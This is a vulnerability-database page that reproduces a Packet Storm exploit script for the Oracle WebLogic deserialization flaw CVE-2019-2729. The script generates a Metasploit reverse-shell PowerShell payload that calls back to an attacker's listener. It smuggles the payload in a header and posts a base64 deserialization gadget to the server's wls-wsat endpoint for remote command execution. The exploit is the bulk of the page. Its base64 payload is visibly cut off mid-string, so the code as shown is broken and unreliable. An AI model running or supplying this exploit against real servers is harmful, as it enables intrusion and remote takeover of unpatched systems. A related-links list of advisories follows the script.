Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPaveway3PACKETSTORM:155886
HistoryJan 09, 2020 - 12:00 a.m.

Oracle Weblogic 10.3.6.0.0 Remote Command Execution

2020-01-0900:00:00
Paveway3
packetstormsecurity.com
206
JSON
`# Exploit Title: Oracle Weblogic 10.3.6.0.0 - Remote Command Execution  
# Date: 2020-01-08  
# Exploit Author: Waffles & Paveway3  
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html  
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0  
# Tested on: Windows  
# CVE : CVE-2019-2729  
  
SerialLogic.py  
  
# Exploit Title: SerialLogic  
# Date: 01-08-2020  
# Exploit Author: Waffles & Paveway3  
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html  
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0  
# Tested on: Windows  
# CVE : CVE-2019-2729  
  
import argparse  
import requests  
import sys  
import os  
import base64  
  
# Colors for terminal output because I likes pretty things  
class bcolors:  
OKGREEN = '\033[92m'  
BOLD = '\033[1m'  
NONERED = '\033[91m'  
ENDLINE = '\033[0m'  
UNDERLINE = '\033[4m'  
  
banner = """\n  
_______ ________ ___ ____ _______ ___ ________ ____   
/ ____/ | / / ____/ |__ \ / __ < / __ \ |__ \/__ /__ \/ __ \  
/ / | | / / __/________/ // / / / / /_/ /_______/ / / /__/ / /_/ /  
/ /___ | |/ / /__/_____/ __// /_/ / /\__, /_____/ __/ / // __/\__, /   
\____/ |___/_____/ /____/\____/_//____/ /____/ /_//____/____/   
"""  
  
print(banner)  
  
parser = argparse.ArgumentParser()  
parser.add_argument('-cs', dest='cobaltstrike', default=False, required=False, help="Use Cobalt Strike as callback", action='store_true')  
parser.add_argument('-msf', dest='metasploit', default=False, required=False, help="Use Metasploit Handler as callback", action='store_true')  
parser.add_argument('-rhost', dest='target_host', default='', required=True, help="Target Host")  
parser.add_argument('-rport', dest='target_port', default='', required=True, help="Target Port")  
parser.add_argument('-lhost', dest='listen_host', default='', required=True, help="Listening host IP for callback")  
parser.add_argument('-lport', dest='listen_port', default='', required=True, help="Listening port for callback")  
parser.add_argument('-ssl', dest='usessl', default=False, required=False, help="Use HTTPS instead of HTTP", action='store_true')  
args = parser.parse_args()  
  
print("\n")  
  
# Assign user arguments to variables we can use  
cobaltstrike = str(args.cobaltstrike)   
metasploit = str(args.metasploit)   
target_host = str(args.target_host)   
target_port = str(args.target_port)   
listen_host = str(args.listen_host)   
listen_port = str(args.listen_port)   
usessl = str(args.usessl)  
  
if cobaltstrike == 'True':  
cobaltstrike = True  
else:  
cobaltstrike = False  
if metasploit == 'True':  
metasploit = True  
else:  
metasploit = False  
if usessl == 'True':  
usessl = True  
else:  
usessl = False  
  
if metasploit and not cobaltstrike:  
os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_MSF.txt > /dev/null 2>&1")  
with open('/tmp/CVE_2019_2729_MSF.txt', 'r') as msfcmd:  
the_cmd = msfcmd.read()  
elif cobaltstrike and not metasploit:  
os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_CS.txt > /dev/null 2>&1")  
with open('/tmp/CVE_2019_2729_CS.txt', 'r') as cscmd:  
the_cmd = cscmd.read()  
else:  
print("Please try with ONE of the payload options.")  
sys.exit()  
  
headers = {  
'Content-Type':'text/xml',  
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',  
'SOAPAction':'',  
'lfcmd':'' + the_cmd  
}  
  
data_pref = '<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <array method="forName"> <string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string> <void>'  
yss_payload = "CjxhcnJheSBjbGFzcz0iYnl0ZSIgbGVuZ3RoPSI2ODYyIj48dm9pZCBpbmRleD0iMTYwMSI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTM4MSI+PGJ5dGU+NjQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODkzIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEyMzUiPjxieXRlPjk5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTE1Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMDkyIj48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjE5Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIwOTEiPjxieXRlPjcyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjM1NCI+PGJ5dGU+MTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTY0Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNTc4Ij48Ynl0ZT4xMDQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4OTciPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE2MjUiPjxieXRlPjEyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjY0MSI+PGJ5dGU+NzI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MjYyIj48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM3MCI+PGJ5dGU+MTA1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjIxNiI+PGJ5dGU+NzQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MTQ3Ij48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMjU1Ij48Ynl0ZT4xMDk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDQiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE0ODQiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDEwOCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNjQyIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MzE4Ij48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjUyIj48Ynl0ZT4yMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjYzMjQiPjxieXRlPjI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0OTY1Ij48Ynl0ZT4xMDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MTcxIj48Ynl0ZT40OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2NTIiPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTc4MyI+PGJ5dGU+MTA5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjc2NiI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTU5NCI+PGJ5dGU+MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijk0MiI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDc4NiI+PGJ5dGU+NzY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMzU5Ij48Ynl0ZT4xMTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MzQxIj48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NTkiPjxieXRlPjExODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxNDgiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUyNjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU0MzIiPjxieXRlPjExNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIxMzkiPjxieXRlPjEwNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2Ij48Ynl0ZT4tMzU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTQ4Ij48Ynl0ZT44MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ3ODgiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTU0MSI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODgxIj48Ynl0ZT40PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTk0NyI+PGJ5dGU+LTc0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTIzNSI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTQ0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzNjEiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI5NDciPjxieXRlPjg3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjQwOCI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjE4MyI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTMyMCI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxODEzIj48Ynl0ZT4xMDM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODA4Ij48Ynl0ZT4xMTI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDMiPjxieXRlPjgzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDI4NiI+PGJ5dGU+MTE1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTY4OSI+PGJ5dGU+NDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTgwIj48Ynl0ZT42OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxMjEiPjxieXRlPjQ4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzEwMCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MTQyIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUzNyI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNDE3Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NDk4Ij48Ynl0ZT41OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5MzciPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjk4NSI+PGJ5dGU+MTA0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTUwMCI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTQ0NyI+PGJ5dGU+NTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMzA0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUwOTciPjxieXRlPjczPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRl  
data = base64.b64decode(yss_payload)  
data_payload = data_pref + data.decode()  
if usessl:  
attackurl = "https://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")  
else:  
attackurl = "http://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")  
res = requests.post(attackurl, headers=headers, data=data_payload, timeout=10)  
  
if cobaltstrike and not metasploit:  
cmd_exec = "Cobalt Strike"  
elif not cobaltstrike and metasploit:  
cmd_exec = "Metasploit"  
print(bcolors.OKGREEN + "[+] Command executed was a " + cmd_exec + " Payload, please check your console" + bcolors.ENDLINE)  
print(bcolors.OKGREEN + "[+] Cleaning up...." + bcolors.ENDLINE)  
  
if os.path.exists("/tmp/CVE_2019_2729_MSF.txt"):  
os.remove("/tmp/CVE_2019_2729_MSF.txt")  
elif os.path.exists("/tmp/CVE_2019_2729_CS.txt"):  
os.remove("/tmp/CVE_2019_2729_CS.txt")  
`

Related

exploitpack 1
checkpoint_advisories 1
githubexploit 4
attackerkb 1
trendmicroblog 2
zdt 1
prion 1
nessus 4
cisa 1
dsquare 1
cve 1
nuclei 1
exploitdb 1
thn 2
symantec 1
threatpost 4
securelist 1
kitploit 1
oracle 5
exploitpack
exploitpack
Oracle Weblogic 10.3.6.0.0 - Remote Command Execution
2020-01-09 00:00:00
checkpoint_advisories
checkpoint_advisories
Oracle Weblogic Insecure Deserialization (CVE-2019-2729)
2019-06-25 00:00:00
githubexploit
githubexploit
Exploit for Improper Access Control in Oracle Weblogic Server
2020-01-09 22:27:36
Exploit for Improper Access Control in Oracle Weblogic Server
2020-02-19 03:49:51
Exploit for Injection in Oracle Weblogic Server
2019-06-24 08:33:07
attackerkb
attackerkb
CVE-2019-2729
2019-06-19 00:00:00
trendmicroblog
trendmicroblog
This Week in Security News: Cyberespionage Campaigns and Botnet Malware
2019-06-21 19:16:21
This Week in Security News: Malvertising and Internet of Things Malware
2019-06-28 14:24:11
zdt
zdt
Oracle Weblogic 10.3.6.0.0 - Remote Command Execution Exploit
2020-01-09 00:00:00
prion
prion
Design/Logic Flaw
2019-06-19 23:15:00
nessus
nessus
Oracle WebLogic Server Deserialization RCE (CVE-2019-2729)
2019-06-27 00:00:00
Oracle WebLogic Server Web Services Remote Code Execution Vulnerability
2019-06-19 00:00:00
Oracle WebLogic Multiple Java Object Deserialization RCE
2018-05-03 00:00:00
cisa
cisa
Oracle Releases Security Advisory for WebLogic
2019-06-19 00:00:00
dsquare
dsquare
Oracle WebLogic Server Web Services RCE
2020-01-08 00:00:00
cve
cve
CVE-2019-2729
2019-06-19 23:15:00
nuclei
nuclei
Oracle WebLogic Server Administration Console - Remote Code Execution
2021-10-21 00:07:30
exploitdb
exploitdb
Oracle Weblogic 10.3.6.0.0 - Remote Command Execution
2020-01-09 00:00:00
thn
thn
New Critical Oracle WebLogic Flaw Under Active Attack — Patch Now
2019-06-19 18:42:00
Oracle Warns of Critical Remotely Exploitable Weblogic Server Flaws
2021-07-22 08:21:00
symantec
symantec
Oracle WebLogic Server Deserialization CVE-2019-2729 Remote Code Execution Vulnerability
2019-06-18 00:00:00
threatpost
threatpost
Oracle Warns of New Actively-Exploited WebLogic Flaw
2019-06-19 16:25:30
Oracle: Unpatched Versions of WebLogic App Server Under Active Attack
2020-05-04 14:57:51
Oracle WebLogic Server RCE Flaw Under Active Attack
2020-10-29 14:49:58
securelist
securelist
IT threat evolution Q3 2019
2019-11-29 10:00:12
kitploit
kitploit
Vulmap - Web Vulnerability Scanning And Verification Tools
2020-12-25 11:30:00
oracle
oracle
Oracle Critical Patch Update Advisory - July 2019
2019-07-16 00:00:00
Oracle Critical Patch Update Advisory - January 2020
2020-01-14 00:00:00
Oracle Critical Patch Update Advisory - July 2021
2021-07-20 00:00:00
JSON
Related for PACKETSTORM:155886
exploitpack1checkpoint_advisories1githubexploit4attackerkb1trendmicroblog2zdt1prion1nessus4cisa1dsquare1cve1nuclei1exploitdb1thn2symantec1threatpost4securelist1kitploit1oracle5